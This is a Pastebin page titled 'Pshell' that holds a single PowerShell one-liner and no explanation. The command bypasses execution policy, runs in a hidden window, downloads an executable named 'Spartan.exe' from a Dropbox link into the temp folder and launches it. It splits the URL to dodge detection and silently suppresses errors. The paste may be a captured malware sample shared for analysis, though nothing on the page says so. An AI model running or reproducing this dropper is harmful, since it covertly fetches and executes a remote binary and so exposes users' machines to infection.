Advertisement
James_inthe_box

Pshell

Nov 22nd, 2017
359
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command try{$down = New-Object System.Net.WebClient;$url = 'HTTPS:/'+'/'+'www.dropbox.com/s/8ah9pe5qnugywo0/Spartan.exe?dl=0';$file = $env:temp + '\Spartan.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);}catch{}exit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement